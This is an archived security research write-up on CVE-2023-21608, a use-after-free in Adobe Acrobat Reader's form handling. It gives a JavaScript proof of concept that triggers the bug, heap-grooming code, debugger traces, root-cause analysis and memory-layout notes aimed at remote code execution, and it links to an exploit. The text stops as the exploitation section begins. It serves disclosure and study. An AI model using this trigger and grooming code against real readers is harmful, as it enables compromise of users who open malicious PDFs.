CVE-2023-21608 _ Adobe Acrobat Reader resetForm RCE

⚠️ [ ORIGIN SOURCE ]

https://hacksys.io/blogs/adobe-reader-resetform-cagg-rce-cve-2023-21608

📅 [ Archival Date ]

Feb 7, 2023 8:24 PM

🏷️ [ Tags ]

AdobeAcrobatRCE

✍️ [ Author ]

Ashfaq Ansari, Krishnakant Patil

💣 [ PoC / Exploit ]

https://crash.software/STRLCPY/CVE-2023-21608

Overview

In the third part of the PDF Reader series, we are going to see how we exploited a use-after-free vulnerability in Adobe Acrobat Reader DC. The bug was found during our fuzzing campaign targeting popular PDF readers. We were able to successfully exploit this vulnerability to gain Remote Code Execution in the context of Adobe Acrobat Reader.

We have already shared 2 parts of the series, where we exploited Adobe Reader for Information Leaks and Foxit PDF Reader for Remote Code Execution (RCE). Both parts are linked below so that you can read more about them.

Zero Day Initiative (ZDI) acquired both the vulnerability and the exploit.

Advisory

CVE-2023-21608

Testbed

OS edition: Windows 10 Pro 20H2 19042.804
Product: Adobe Acrobat Reader DC 2022.003.20258
Product URL: https://get.adobe.com/reader/otherversions/

Proof of Concept

The test case contains a static text field named testField embedded inside a PDF document.

5 0 obj
<<
/Type /Annot
/Subtype /Widget
/T (testField)
/FT /Tx
/Rect [0 0 0 0]
>>

Below given is the relevant JavaScript part that triggers the bug.

var testField = this.getField("testField");

testField.richText = true;
testField.setAction("Calculate", "calculateCallback()");

try { this.resetForm(); } catch (e) {}
try { this.resetForm(); } catch (e) {}  // bug is triggered during this resetForm call

function calculateCallback()
{
  event.__defineGetter__("target", getterFunc);
  event.richValue = this;
}

function getterFunc()
{
  try { Object.defineProperty(testField, "textFont", { value: this }); } catch(e) { }
}

Crash State

Enable page-heap for AcroRd32.exe and open the crash.pdf file with Acrobat Adobe Reader DC.

eax=04f6a0f0 ebx=00000000 ecx=420fefd0 edx=44e1cff8 esi=6921ef50 edi=420fefd0
eip=6c556b99 esp=04f6a0d0 ebp=04f6a0fc iopl=0         nv up ei pl nz na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010206
AcroForm!CAgg::operator[](unsigned short)+0xe:
6c556b99 8b07            mov     eax,dword ptr [edi]  ds:002b:420fefd0=????????

Note: All analysis and exploitation outlined in this post is done on Adobe Acrobat Reader DC version 2022.001.20085 x86.

Stack Trace

0:000> kb
 # ChildEBP RetAddr      Args to Child              
00 04f6a0fc 6c552a50     00001742 408bcff0 00000000 AcroForm!CAgg::operator[](unsigned short)+0xe
01 04f6a118 6bdfd922     43a38fb8 527e4ff0 408bcff0 AcroForm!EScript_ESObjectEnum_CallbackProc+0x30
02 04f6a16c 6bdfd803     43a38fb8 6c552a20 04f6a1c8 EScript!ESObjectEnum+0xc3
03 04f6a184 692fe993     43a38fb8 6c552a20 04f6a1c8 EScript!ESObjectEnumWrapper+0x13
WARNING: Stack unwind information not available. Following frames may be wrong.
04 04f6a19c 6c55298c     43a38fb8 6c552a20 04f6a1c8 AcroRd32!DllCanUnloadNow+0xa6553
05 04f6a1e4 6c552c3f     420fefd0 43a38fb8 00000000 AcroForm!ESValToCAgg_internal+0x447
06 04f6a20c 6c552a56     420fefd0 46ed4ff0 00000000 AcroForm!ESValToCAgg(CAgg &, _s_ESValRec *, unsigned short)+0xd6
07 04f6a228 6bdfd922     503d4fb8 45970ff0 46ed4ff0 AcroForm!EScript_ESObjectEnum_CallbackProc+0x36
08 04f6a27c 6bdfd803     503d4fb8 6c552a20 04f6a2d8 EScript!ESObjectEnum+0xc3
09 04f6a294 692fe993     503d4fb8 6c552a20 04f6a2d8 EScript!ESObjectEnumWrapper+0x13
0a 04f6a2ac 6c55298c     503d4fb8 6c552a20 04f6a2d8 AcroRd32!DllCanUnloadNow+0xa6553
0b 04f6a2f4 6c552c3f     505fafd0 503d4fb8 00000000 AcroForm!ESValToCAgg_internal+0x447
0c 04f6a31c 6c552a56     505fafd0 3d259ff0 00000000 AcroForm!ESValToCAgg(CAgg &, _s_ESValRec *, unsigned short)+0xd6
0d 04f6a338 6bdfd922     4e5dcfb8 4948eff0 3d259ff0 AcroForm!EScript_ESObjectEnum_CallbackProc+0x36
0e 04f6a38c 6bdfd803     4e5dcfb8 6c552a20 04f6a3e8 EScript!ESObjectEnum+0xc3
0f 04f6a3a4 692fe993     4e5dcfb8 6c552a20 04f6a3e8 EScript!ESObjectEnumWrapper+0x13
10 04f6a3bc 6c55298c     4e5dcfb8 6c552a20 04f6a3e8 AcroRd32!DllCanUnloadNow+0xa6553
11 04f6a404 6c552c3f     04f6afa8 4e5dcfb8 00000000 AcroForm!ESValToCAgg_internal+0x447
12 04f6a42c 6c552aea     04f6afa8 47cf6ff0 00000000 AcroForm!ESValToCAgg(CAgg &, _s_ESValRec *, unsigned short)+0xd6
13 04f6a46c 6c513b35     04f6afa8 47cf6ff0 00000000 AcroForm!ESValToCAggWrapper+0x1e
14 04f6a4c8 6bddf79b     48cf2fb8 45230ff0 47cf6ff0 AcroForm!SetRichValueEventProp+0x1f5
15 04f6a534 6bddf5bc     3cdaef58 04f6a68c 04f6a568 EScript!sub_1003F620+0x17b
16 04f6a56c 6bdba592     3cdaef58 04f6a68c 04f6a68c EScript!sub_1003F4E7+0xd5
17 04f6a5a4 6bdba2fe     3cdaef58 04f6a68c 04f6a68c EScript!sub_1001A4D2+0xc0
18 04f6a64c 6bdd8a6b     3cdaef58 04f6a68c 04f6a68c EScript!sub_10019E93+0x46b
19 04f6a690 6bdd4cd7     3cdaef58 04f6aac0 4fdc2fcf EScript!sub_100389D2+0x99
1a 04f6ab00 6bdd246b     3cd5da60 6bdd24c0 00000438 EScript!js_Interpret+0x2828
1b 04f6ab4c 6bdd237b     3cdaef58 04f6ab60 3cdaef58 EScript!sub_10032412+0x59
1c 04f6ab88 6bdd22b0     3cdaef58 04f6abfc 3d1a4100 EScript!sub_10032315+0x66
1d 04f6abbc 6bdbb6b0     3cdaef58 04f6abfc 3d1a4100 EScript!js_Execute+0x7d
1e 04f6ac0c 6bdfa9c6     3cdaef58 04f6ac8c 00000000 EScript!JS_EvaluateUCScriptForPrincipals+0x8b
1f 04f6ac90 6bdfa6cb     3cdaef58 3d1a4100 4c93efd8 EScript!JS_EvaluateUCScript+0x4d
20 04f6ae44 6bdfa046     3d4f9ff0 49488fe0 49f3cff0 EScript!ESExecScript+0x10b
21 04f6ae90 6bdf8e23     3cdacfc0 390b4fb8 49d20fc0 EScript!AESEvaluateScript+0x3d
22 04f6af30 692fcbdf     1f2c0bd0 390b4fb8 49cf4fc0 EScript!ESExecuteScriptWithEvent+0x4a3
23 04f6af58 6c543fd4     1f2c0bd0 00000000 49cf4fc0 AcroRd32!DllCanUnloadNow+0xa479f
24 04f6b03c 6c543270     1f2c0bd0 5135cfa0 00000000 AcroForm!AFCalculateNthFieldEntry_x+0x4b8
25 04f6b074 6c545f65     1f2c0bd0 00000000 00001467 AcroForm!AFPDCalculateFields__internal+0xfd
26 04f6b0b0 6c5c4c37     1f2c0bd0 00000000 1f2c0bd0 AcroForm!AFPDCalculateFields+0x9f
27 04f6b1b0 6c50fa1c     1f2c0bd0 00000000 00000000 AcroForm!ResetForm(_t_PDDoc *, OPAQUE_64_BITS, unsigned short)+0x477
28 04f6b65c 6bdf3fb7     390b4fb8 45fe4ff0 5225afb8 AcroForm!resetFormHandler+0x5fc

A quick verification using the !heap command reveals that this is a use-after-free vulnerability.

0:000> !ext.heap -p -a @edi
    address 420fefd0 found in
    _DPH_HEAP_ROOT @ 7831000
    in free-ed allocation (  DPH_HEAP_BLOCK:         VirtAddr         VirtSize)
                                   372134ac:         420fe000             2000
    6e44ab02 verifier!AVrfDebugPageHeapFree+0x000000c2
    770af766 ntdll!RtlDebugFreeHeap+0x0000003e
    770668ae ntdll!RtlpFreeHeap+0x0004e0ce
    770562ed ntdll!RtlpFreeHeapInternal+0x00000783
    77018786 ntdll!RtlFreeHeap+0x00000046
    755d3c9b ucrtbase!_free_base+0x0000001b
    755d3c68 ucrtbase!free+0x00000018
    6c2e7a56 AcroForm!operator delete(void *)+0x0000000b
    6c555f05 AcroForm!sub_20AD5ECD+0x00000038
    6c555e5f AcroForm!sub_20AD5E3B+0x00000024
    6c555e54 AcroForm!sub_20AD5E3B+0x00000019
    6c555e1b AcroForm!sub_20AD5DE9+0x00000032
    6c557abf AcroForm!CAgg::convertASAtommap(bool (&)[27])+0x000002e0
    6c557559 AcroForm!CAgg::convert(bool (&)[27])+0x000000e7
    6c5576c0 AcroForm!CAgg::convert(CAgg::CAggType)+0x00000045
    6c556d10 AcroForm!sub_20AD6CDD+0x00000033
    6c555efd AcroForm!sub_20AD5ECD+0x00000030
    6c555e5f AcroForm!sub_20AD5E3B+0x00000024
    6c555e54 AcroForm!sub_20AD5E3B+0x00000019
    6c555e54 AcroForm!sub_20AD5E3B+0x00000019
    6c555e1b AcroForm!sub_20AD5DE9+0x00000032
    6c557abf AcroForm!CAgg::convertASAtommap(bool (&)[27])+0x000002e0
    6c557559 AcroForm!CAgg::convert(bool (&)[27])+0x000000e7
    6c55766d AcroForm!sub_20AD75F2+0x0000007b
    6c551b9e AcroForm!CAggConvertToESValType(CAgg &)+0x0000001f
    6c551be0 AcroForm!CAggToESVal(_s_ESValRec *, CAgg &)+0x0000003d
    6c5131ce AcroForm!GetRichValueEventProp+0x0000011e
    6bdde176 EScript!sub_1003DF10+0x00000266
    6bde306d EScript!sub_10042FE8+0x00000085
    6bdb50fd EScript!sub_10014B57+0x000005a6
    6bdb4b4a EScript!sub_10014B17+0x00000033
    6bdddcd2 EScript!sub_1003DC6A+0x00000068

At this stage, with the above initial analysis in hand, we decided to deep dive into analyzing the root cause of this bug and see if we could exploit it to achieve RCE in Adobe Reader's sandbox process.

Root Cause Analysis

A couple of things to note in this PoC

The bug occurs during the second call to the resetForm
resetForm invokes calculate events on all fields if a Calculate handler is defined
In the Calculate handler, the event object's target property is overridden with a user-defined function getterFunc
Inside this getterFunc function, the textFont property of the field is redefined with the value of the doc object
This causes a crash when the event.richValue = this assignment is executed in the Calculate handler

The crash can be traced back through the call stack to the responsible call hierarchy.

AcroForm!ResetForm                             | this.resetForm()
  AcroForm!AFPDCalculateFields
    AcroForm!AFCalculateNthFieldEntry           
      AcroForm!AFCalculateNthFieldEntry           
    AcroForm!AFCalculateNthFieldEntry           
      |- user defined callback is triggered.   | field Calculate handler invoked
        AcroForm!SetRichValueEventProp         | event.richValue = this

        .. some form of aggregation starts on richValue ..

          AcroForm!EScript_ESObjectEnum_CallbackProc
            AcroForm!CAgg::operator[](unsigned short)

The bug occurs when some form of value aggregation starts inside SetRichValueEventProp, which enumerates the assigned object this, which is an instance of the current doc object.

The properties and methods of doc are enumerated recursively using EScript!ESObjectEnum, which accepts a callback where enumerated property details are passed from EScript to AcroForm. The AcroForm!EScript_ESObjectEnum_CallbackProc callback is triggered for every property being enumerated.

When page-heap is enabled, the crash occurs in _DWORD *__thiscall std::map<unsigned short,CAgg>::lower_bound(TREE_VAL *this, _DWORD *a2, unsigned __int16 *a3) when dereferencing this pointer, which is a std::map object in the current context.

DWORD *__thiscall std::map<unsigned short,CAgg>::lower_bound(TREE_VAL *this, _DWORD *a2, unsigned __int16 *a3)
{
  TREE_NODE *Myhead; // eax
  TREE_NODE *Parent; // ecx
  unsigned __int16 v5; // si
  int v6; // eax

  Myhead = this->_Myhead;  // crash location - page-heaps enabled
  Parent = this->_Myhead->_Parent;
  ...
}

After checking for the caller of this function, it appears that the int __thiscall std::map<unsigned short,CAgg>::operator[](TREE_VAL *this, int a2, unsigned __int16 *pSomeID) function is responsible for inserting a value into the corresponding std::map.

int __thiscall std::map<unsigned short,CAgg>::operator[](TREE_VAL *this, int a2, unsigned __int16 *pSomeID)
{
  ...
  std::map<unsigned short,CAgg>::lower_bound(this, v8, pSomeID);  // Crashing path when page-heap is enabled
  v4 = v9;
  if ( sub_208E95F2(v9, pSomeID) )
  {
    ...
  }
  else
  {
    if ( this->_Mysize == 0x38E38E3 )
      Throw_tree_length_error();
    ...
    *(_DWORD *)a2 = std::map<unsigned short,CAgg>::insert(this, v8[0], (int)v8[1], Parent);
    ...
  }
  return result;
}

The code above shows that a new CAgg allocation is created while inserting a value into the std::map. Testing with heap grooming and the .dvalloc trick revealed that the std::map<unsigned short,CAgg>::insert function also allows for arbitrary writes on the chosen address. By using heap grooming, it is possible to gain control of the corrupted std::map pointer used in this context, allowing for further exploitation.

TREE_NODE *__thiscall std::map<unsigned short,CAgg>::insert(TREE_VAL *this, TREE_NODE *a2, int a3, TREE_NODE *a4)
{
  
  ++this->_Mysize;  // write possible here (single increment though)
                    // map length increase
  Myhead = this->_Myhead;
  v5 = a4;
  a4->_Parent = a2;
  if ( a2 != Myhead )
  {
    if ( a3 )
    {
      a2->_Left = a4;  // write is possible here and we can use this to corrupt length property of a ArrayBuffer
                       // mov dword ptr [eax], esi  ds:002b:13fa0000=45454545
      if ( a2 == Myhead->_Left )
        Myhead->_Left = a4;
    }
  }
   ...
}

By exploiting the arbitrary write, it is possible to corrupt the length of the ArrayBuffer and gain relative out-of-bounds read-write capabilities. This allows for relative data to be read from or written to memory locations outside of the bounds of the ArrayBuffer.

Further investigation into how the map was corrupted revealed that the AcroForm!CAgg::operator[](unsigned short) function was calling std::map<unsigned short,CAgg>::operator[] with this->map. When examining the CAgg object in the debugger, it was discovered that it had been freed and was now user-controlled. This opened up the possibility for further exploitation of the vulnerability.

// Crash function 2
int __userpurge CAgg::operator[]@<eax>(CAgg *this@<ecx>, bool (*a2)[27]@<ebx>, wchar_t *someID)
{
  ...

  if ( this->type == 0x13 )  // *this == (CAgg::getType) | crashes here with page-heaps
                             // this is the freed pointer
  {
    ...
  }
  else
  {
    ...
    else
    {
      // this path is taken when page-heap is disabled and heap grooming is performed prior to bug trigger
      CAgg::convert(this, a2, 0x14);
      v4 = (_DWORD *)std::map<unsigned short,CAgg>::operator[](this->map, (int)v9, (unsigned __int16 *)&someID);
    }
    return *v4 + 24;
  }
}

While there were no obvious primitives available on the corrupted CAgg object, it was possible to read its type with this->type. The CAgg::operator[] function was called from EScript_ESObjectEnum_CallbackProc, which is triggered for each property being enumerated by EScript!ESEnumObject. This provided some insight into how the object was corrupted and could potentially be exploited.

int __usercall EScript_ESObjectEnum_CallbackProc@<eax>(
        bool (*ebx0)[27]@<ebx>,
        int a2,
        wchar_t *key_str,
        wchar_t *a4,
        int ***pCAggData)
{
  CAgg **pCagg; // edi
  unsigned __int16 someID; // ax
  CAgg *v7; // eax

  pCagg = (CAgg **)*pCAggData;  // AtomFromString retrieves some integer id from string
                                //
                                // bp AcroForm!sub_20AD2A20+0x22 "da poi(esp); gc"
                                //
  someID = (*(int (__cdecl **)(wchar_t *))(gCoreHFT + 20))(key_str);  // gCoreHFT->ASAtomFromString(a2);
  v7 = (CAgg *)CAgg::operator[]((CAgg *)pCagg, ebx0, (wchar_t *)someID);
  ESValToCAgg(v7, a4, 0);
  return 1;
}

In this current scenario, we have a problem with the pCagg object. This object has already been freed, but it is still being used in the callback function EScript_ESObjectEnum_CallbackProc where it's passed to the ESValToCAgg function.

Note: This function is recursive, so the problem repeats over and over.

Our analysis shows that the CAgg objects are allocated inside the std::map<unsigned short,CAgg>::operator[] function during each property enumeration when setting the richValue property. However, during the resetForm process, the event.target property is trapped using __defineGetter__. This function is called during the recursive properties enumeration of the doc object. When the target property is accessed, the getterFunc function is called, which redefines the field's textFont property as the doc object. This also sets it to be non-configurable and non-enumerable.

During the second resetForm, the same process is repeated, but when getterFunc is called again, it raises an exception because of the field.textFont property is now non-configurable. This causes a different path to be taken when accessing the event.richValue property, which frees all of the CAgg objects that have been constructed so far. The free code path is called while the object enumeration is still in progress, and when it finishes, it triggers the use of the freed CAgg object.

{
  ...
  v7 = 0;
  v8 = 15;
  LOBYTE(v6[0]) = 0;
  sub_2085ECA0(v6, "EventRichValueInProgress");
  sub_20AAE7D6(v15, a1, (int)v6[0], (int)v6[1], (int)v6[2], (int)v6[3], v7, v8);
  LOBYTE(v16) = 3;
  if ( v13
    && (*(unsigned __int16 (__thiscall **)(_DWORD, wchar_t *, const wchar_t *))(dword_21473CB8 + 180))(
          *(_DWORD *)(dword_21473CB8 + 180),
          v13,
          "richValue") )
  {
    PointerType = (CAgg *)ASCabGetPointerTypeSafe<CAgg *>(v13, (wchar_t *)"richValue", (wchar_t *)"CAgg_P");
    if ( PointerType )
      CAggToESVal(0, v11, PointerType);  // frees all CAggs and maps
  }
  ...
}

Above hypothesis can be verified using a debugger by setting up the following breakpoints in WinDbg.

bp AcroForm!resetFormHandler
bp AcroForm!EScript_ESObjectEnum_CallbackProc ".printf \"-- [^] property: %ma - \\n \", poi(esp+8); gc;"
bp AcroForm!uninit_sub_20AA701F+0x25 ".printf \"    - alloc: %p \\n \", @eax; .echo; gc"
bp AcroForm!GetRichValueEventProp+0x119 ".printf \" ------------free code path \\n \"; gc"
bp AcroForm!sub_20AD5DE9 ".printf \"[map] root: %p size %p \\n \", poi(@ecx), poi(@ecx+4); gc;"
bp AcroForm!sub_20AD5DE9+0x36 ".printf \"   [+] PTR_1 freed: %p \\n \", poi(@esi); gc"
bp AcroForm!sub_20AD6CDD+0x3c ".printf \"   [+] PTR_2 freed: %p \\n \", @esi; gc"
bp AcroForm!sub_20AD5ECD+0x33 ".printf \"   [+] block freed: %p \\n \", @esi; gc"
bp AcroForm!ESValToCAgg_internal+0x403 ".printf \"   [+] pData: %p \\n \", @ecx; gc"

The trace output result from the above breakpoints is provided below.

[+] pData: 00afb1e8
 -- [^] property: ADBCAnnotEnumerator -
     - alloc: 64b3cfb8

     ... all other properties ....

-- [^] property: textFont -
     - alloc: d41d0fb8                       <- CAgg* allocated here

   [+] pData: d41d0fd0                       <- std::map inside CAgg
 -- [^] property: change -
     - alloc: 6951bfb8

     ... all other properties ....
 
-- [^] property: rc -
     - alloc: c7b8efb8

 ------------free code path
 ...

[map] root: d2d14fb8 size 0000018f
 [map] root: ee802fb8 size 00000041
    [+] block freed: ce58efb8
    [+] block freed: e0dd6fb8
    ...
 [map] root: e4826fb8 size 00000008
    ...
    [+] PTR_1 freed: e4826fb8
    [+] block freed: d41d0fb8                <-  CAgg* freed here
    [+] block freed: c211afb8
    ...
 [map] root: d2bdcfb8 size 00000000
    [+] PTR_1 freed: d2bdcfb8
    [+] block freed: 6c43efb8
    [+] block freed: d3612fb8
    ...

 -- [^] property: richValue -

(1ba0.f80): Access violation - code c0000005 (first/second chance not available)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
Time Travel Position: 382C19E:0

eax=00afa330 ebx=00000000 ecx=d41d0fd0 edx=7af18ff8 esi=6fa3ef50 edi=d41d0fd0
eip=6e6b6b99 esp=00afa310 ebp=00afa33c iopl=0         nv up ei pl nz na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200206
AcroForm!CAgg::operator[](unsigned short)+0xe:
6e6b6b99 8b07            mov     eax,dword ptr [edi]  ds:002b:d41d0fd0=abcdbbba

0:000> dc d41d0fb8
d41d0fb8  00000000 00000000 00000000 00000000  ................
d41d0fc8  00000000 00000000 abcdbbba 07971000  ................
d41d0fd8  00000010 00001000 00000000 00000000  ................
d41d0fe8  09009a6c dcbabbba 00000000 ffffff82  l...............
d41d0ff8  3b5fafc0 c0c0c001 c0c0c0c0 c0c0c0c0  .._;............
d41d1008  c0c0c0c0 c0c0c0c0 c0c0c0c0 c0c0c0c0  ................
d41d1018  c0c0c0c0 c0c0c0c0 c0c0c0c0 c0c0c0c0  ................
d41d1028  c0c0c0c0 c0c0c0c0 c0c0c0c0 c0c0c0c0  ................
I

Inside the debugger, we can see the corrupted std::map object pData: d41d0fd0, which is part of the freed CAgg object that was allocated during the enumeration of the textFont property alloc: d41d0fb8.

When the free code path is taken, all objects and map objects are freed. The same pointer is later accessed when processing the richValue property enumeration, leading to a use-after-free condition.

Note: During the testing to control the use-after-free condition, we did not find any code paths that would allow us to reallocate the freed memory in a way that could be exploited.

However, we discovered that certain object sizes can cause Adobe Acrobat Reader to crash while dereferencing the sprayed pattern, giving us the possibility to exploit the bug for Remote Code Execution (RCE).

Heap Grooming

var blockRefs = [];

function groomLFH(size, count) {
  log("[+] Grooming LFH blocks of size: " + size + " count: " + count);

  const code =
      "%u4141%u4242%u4343%u4444%u4545%u4646%u4747%u4848%u4949%u4a4a%u4b4b%u4c4c%u4d4d%u4e4e%u4f4f%u5050%u4141%u4242%u5353%u5454%u5555%u5656%u5757%u5858%u5959%u5a5a%u5b5b%u5c5c%u5d5d%u5e5e%u5f5f%u6060%u6161%u6262%u6363%u6464%u6565%u6666%u6767%u6868%u6969%u6a6a%u6b6b%u6c6c%u6d6d%u6e6e%u6f6f%u7070%u7171%u7272%u7373%u7474%u7575%u7676%u7777%u7878%u7979%u7a7a%u7b7b%u7c7c%u7d7d%u7e7e%u7f7f%u8080%u8181%u8282%u8383%u8484";
  const string = unescape(code);

  for (var i = 0; i < count; i++) {
      blockRefs.push(string.substr(0, (size - 2) / 2).toUpperCase());
  }

  for (var i = 0; i < blockRefs.length; i += 2) {
      blockRefs[i] = null;
      delete blockRefs[i];
  }
}

groomLFH(68, 4000);

By grooming heap allocations with an object of size 68, we were able to control the crash. The crashing object size was initially found by brute forcing.

Note: The grooming was done before the UaF was triggered. We will come back to this later.

eax=04b7a854 ebx=04b7a8b4 ecx=42424141 edx=4e4e4d4d esi=6921ef50 edi=42424141
eip=6c3695af esp=04b7a838 ebp=04b7a838 iopl=0         nv up ei pl nz ac po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010212
AcroForm!CAgg::operator[](unsigned short)+0x3:
6c3695af 8b01            mov     eax,dword ptr [ecx]  ds:002b:42424141=????????

In the crashing function, we can see that the user-controlled value is being dereferenced.

The allocation source can be verified in WinDbg as shown below.

0:015> !ext.heap -p -a 36f76fb8
    address 36f76fb8 found in
    _DPH_HEAP_ROOT @ 9801000
    in busy allocation (  DPH_HEAP_BLOCK:         UserAddr         UserSize -         VirtAddr         VirtSize)
                                36f51924:         36f76fb8               48 -         36f76000             2000
    6fb1a8b0 verifier!AVrfDebugPageHeapAllocate+0x00000240
    76fbef0e ntdll!RtlDebugAllocateHeap+0x00000039
    76f26150 ntdll!RtlpAllocateHeap+0x000000f0
    76f257fe ntdll!RtlpAllocateHeapInternal+0x000003ee
    76f253fe ntdll!RtlAllocateHeap+0x0000003e
    75d00166 ucrtbase!_malloc_base+0x00000026
    6aaaee40 AcroForm!operator new(unsigned int)+0x0000001a
    6acf7044 AcroForm!sub_20AA701F+0x00000025
    6ad25a56 AcroForm!sub_20AD5A43+0x00000013
    6ad25fba AcroForm!std::map<unsigned short,CAgg>::operator[](unsigned short const&)+0x00000057
    6ad26bc5 AcroForm!CAgg::operator[](unsigned short)+0x0000003a
    6ad22a50 AcroForm!EScript_ESObjectEnum_CallbackProc+0x00000030
    ...
    6ace3b35 AcroForm!SetRichValueEventProp+0x000001f5
    ...

By further looking at what was causing the controlled crash as the heap-grooming before the bug trigger, we observed that the array of sprayed string objects is also used during aggregation when the resetForm is in progress.

Inside CAggToESVal when the object type is a string, the below code is triggered which creates a new string from CAgg.

int __usercall CAggToESVal@<eax>(bool (*a1)[27]@<ebx>, wchar_t *a2, CAgg *a3)
{
  ...
  else
    {
      m_str = (_EStrRec **)CAgg::toEStr(a3, a1);
      if ( *m_str )
        v14 = EStrCopyImpl(*m_str);
      else
        v14 = 0;
      if ( EStrGetEncoding((MayBeString *)v14) )
        EStrSetEncoding(v14, 2);
      v15 = dword_21472158;
      Bytes = EStrGetBytes((MayBeString *)v14);
      result = (*((int (__cdecl **)(wchar_t *, int))v15 + 31))(a2, Bytes);  // ESValSetString
      if ( v14 )
        return EStrDelete(v14);
    }
}

One important detail to note here is the call to EScript!ESValSetString to create new string content from the CAgg string object (which are our sprayed string objects). ESValSetString calls sub_1003EBD2 to create a string with the given content, which is further responsible for allocating a heap buffer of the string length and copying the source string content into it.

char **__usercall sub_1003EBD2@<eax>(__int128 a1@<xmm0>, int a2, wchar_t *a3)
{
  ...
  sub_1003E853((int *)a2);
  if ( a3
    && strlen_0(a3, 0x7FFFFFFFu, 0) > 1
    && (*(_BYTE *)a3 == 0xFE && *((_BYTE *)a3 + 1) == 0xFF || *(_BYTE *)a3 == 0xFF && *((_BYTE *)a3 + 1) == 0xFE) )
  {
    v24 = 0;
    v22 = 0x7FFFFFFF;
    _mm_lfence();
    v3 = miStrlen(a3, v22, v24);
    v4 = JS_malloc_Wrapper(*(_DWORD *)a2, v3);  // reallocate freed buffer again when string length is 0x48
    Block = (char *)v4;
    if ( v4 )
    {
      v25 = v3;
      v23 = (char *)v4;
      v21 = (char *)(a3 + 1);
      _mm_lfence();
      swab(v21, v23, v25);
      return JS_NewUCString(a1, *(_DWORD **)a2, Block, v3 / 2 - 1);
    }
    return 0;
  }
  ...
}

In the above code, JS_malloc_Wrapper will reallocate the freed CAgg buffer when processing a large number of strings, allowing us to reallocate the buffer with user-controlled data. When this sprayed buffer is later used in the CAgg::* functions, it causes a crash while dereferencing user-controlled data.

SpiderMonkey Internals in EScript.API

Firefox's Spidermonkey is the JavaScript engine used inside Adobe Reader through EScript.API plugin for processing JavaScript embedded inside PDFs. To effectively exploit this bug, we need to understand how JavaScript objects are implemented inside Spidermonkey and their memory organization.

Spidermonkey uses the 64-bit representation to store JavaScript native jsval inside the memory.

Double are stored in full 64-bit IEEE-754 value
Other jsval like numbers, strings, objects, etc. uses 32-bit for type tagging and 32-bit for storing actual value (or object pointer)

ArrayBuffer

We will use ArrayBuffer for spraying user-controlled data at predictable addresses and corrupting the length with an arbitrarily large integer value to gain out-of-bounds read-write primitives. Let's look at how it is represented in memory.

ArrayBuffer implementation has 0x10 bytes header + content equal to the size specified.

4ef0cbf0  00000000 00000400 3cc31450 00000000  ........P..<.... +0x4: length, +0x8: TypedArray pointer
4ef0cc00  41424344 45464748 00000000 00000000  DCBAHGFE........ actual contents starts here
4ef0cc10  00000000 00000000 00000000 00000000  ................
4ef0cc20  00000000 00000000 00000000 00000000  ................
4ef0cc30  00000000 00000000 00000000 00000000  ................
4ef0cc40  00000000 00000000 00000000 00000000  ................
4ef0cc50  00000000 00000000 00000000 00000000  ................
4ef0cc60  00000000 00000000 00000000 00000000  ................

Length is stored at an offset of 0x4
If a TypedArray is initialized then, at an offset of 0x8 you find the TypedArray pointer
Finally, you have the actual user-controlled data

In the EScript.api, the sub_10131A2C function is responsible for allocating an ArrayBuffer of the specified length. If the size of the ArrayBuffer is less than 0x68, an inline representation is used to store the data. Otherwise, a block of memory of the specified size is created and filled with zeros.

char __thiscall sub_10131A2C(void **this, int a2, size_t Size, void *Src)
{
  _DWORD *v5; // eax
  void *v7; // eax
  unsigned __int8 v10; // [esp-4h] [ebp-10h]

  if ( Size <= 0x68 )  // if size is less may be inline buffer creation | does not use heap
                       // heap -p -a @buffer failed to show any trace
  {
    this[3] = this + 10;  // address to our ArrayBuffer->buffer | this+0x28
    _mm_lfence();
    if ( Src )
      memcpy(this[3], Src, Size);
    else
      memset(this[3], 0, Size);
    v7 = this[3];
  }
  else
  {
    v10 = 0;
    _mm_lfence();
    v5 = sub_1013153C((wchar_t *)a2, Size, Src, (_DWORD *)v10);
    if ( !v5 )
      return 0;
    v7 = v5 + 4;
    this[3] = v7;
  }
  *((_DWORD *)v7 - 4) = 0;
  *((_DWORD *)v7 - 3) = Size;  // length of the ArrayBuffer
  *((_DWORD *)v7 - 1) = 0;     // typed array pointer initialized to nullptr
  *((_DWORD *)v7 - 2) = 0;
  return 1;
}

Array

var a = new Array();
a[0] = 0x41424142
a[1] = 0x55555555;
a[2] = "javascript";
a[3] = {};

We will use Array for achieving addrOf (address of) primitive. Below given is the representation of the JavaScript array in memory.

0d9a2678  00000000 00000004 00000006 00000004  ................ 0x0: flag, 0x4: initLength, 0x8: capacity, 0xc: length
0d9a2688  41424142 ffffff81 55555555 ffffff81  BABA....UUUU.... (value, tag) for each value
0d9a2698  0d735fe0 ffffff85 0d9bf200 ffffff87  ._s.............
0d9a26a8  00000000 00000000 00000000 00000000  ................
0d9a26b8  00000000 00000000 00000000 00000000  ................
0d9a26c8  00000000 00000000 00000000 00000000  ................
0d9a26d8  00000000 00000000 00000000 00000000  ................
0d9a26e8  00000000 00000000 00000000 00000000  ................

sub_1004DBA9 in EScript.api is responsible for creating arrays and can be tracked while spraying arrays.

The contents of the array are organized in (tag, value) tuple in memory, where the tag is used to identify the type associated with the value.

e.g.

Number - ffffff81
String - ffffff85
Object - ffffff87

When we have out-of-bounds access on the ArrayBuffer, we can spray a large JavaScript array just after ArrayBuffer and use the out-of-bounds primitive to read the address of any arbitrary JavaScript object.

We can see the way our string is represented in memory by dumping the memory of the above pointer.

0:016> dc 0d735fe0
0d735fe0  000000a8 0d735fe8 0061006a 00610076  ....._s.j.a.v.a. 0x0: length, 0x4: ptr to content, 0x8: inlined contents
0d735ff0  00630073 00690072 00740070 00000000  s.c.r.i.p.t.....
0d736000  0bf80fb0 0d734000 0fff1000 00000013  .....@s.........
0d736010  00000228 0c1451f8 00000000 00000000  (....Q..........
0d736020  000000d8 0c0b8638 00000000 00000000  ....8...........
0d736030  000000d8 0c0b8660 00000000 00000000  ....`...........
0d736040  000001e8 0c149bb0 00000000 00000000  ................
0d736050  000000f8 0c0b8890 00000000 00000000  ................

Further, in exploitation, we will create fake strings with the help of ArrayBuffer and use one of the sprayed fake strings to read arbitrary memory contents, achieving temporary arbitrary read primitive.

Exploitation

Used .dvalloc to see if we have any controlled read-write crashes or a crash while calling arbitrary virtual function pointer.

We found a crash that leads to arbitrary-write on our controlled address

(*ecx) = some_32_value where ecx is user-controlled pointer.

